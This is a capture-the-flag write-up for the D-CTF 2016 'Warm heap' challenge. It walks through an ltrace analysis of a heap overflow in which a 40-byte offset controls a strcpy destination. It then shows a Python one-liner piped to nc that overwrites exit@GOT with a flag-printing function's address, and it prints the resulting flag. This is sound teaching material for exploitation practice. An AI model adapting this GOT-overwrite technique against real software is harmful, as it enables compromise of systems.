D-CTF Quals 2016 - Warm heap [Exploit]

Competition: https://dctf.def.camp/
Challenge Name: Warm heap
Type: Exploitation
Points: 100

While analyzing the provided binary (ELF x64), only NX is enabled.
PE Inspecting it and putting a long string in the first line, a segmentation fault happens. Using the ltrace is possible to see exactly what is going on:

$ ltrace ./exp100.bin __libc_start_main(0x4008a8, 1, 0x7ffdb143cf78, 0x4009c0 <unfinished ...>
... fgets(AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA "AAA%AAsAABAA$AAnAACAA-AA(AADAA;A"..., 4096, 0x7f4d857ba8e0) = 0x7ffdb143be80
strcpy(0x237a030, "AAA%AAsAABAA$AAnAACAA-AA(AADAA;A"...) = 0x237a030
fgets(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"..., 4096, 0x7f4d857ba8e0) = 0x7ffdb143be80
strcpy(0x4141464141304141, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"... <no return ...>
--- SIGSEGV (Segmentation fault) --- +++ killed by SIGSEGV +++

As observed, using 40 bytes offset on the first line, we can control the first argument on the second strcpy(), the destination address. And with the second line we can control the second argument, the data being copied, so let's plan the strategy.

While reversing it, it is possible to see that the program calls a function exit@GOT at 0x601068 after the strings copies are done, so we can overwrite it with anything we want and it will be executed.

got

During the binary inspection on IDA Pro, we can easily identify a function that prints the flag at 0x400826, as observed below:

IDA Pro

So, we can overwrite the exit@GOT with the print flag function address.

$ python -c 'print "A"*40 + "\x68\x10\x60\x00\x00\x00\x00\x00" + "\n" + "\x26\x08\x40\x00\x00"'| nc 10.13.37.21 13371

And the flag comes up:

DCTF{b94c21ff7531cba35a498cb074918b3e}

mphx2

Read more posts by this author.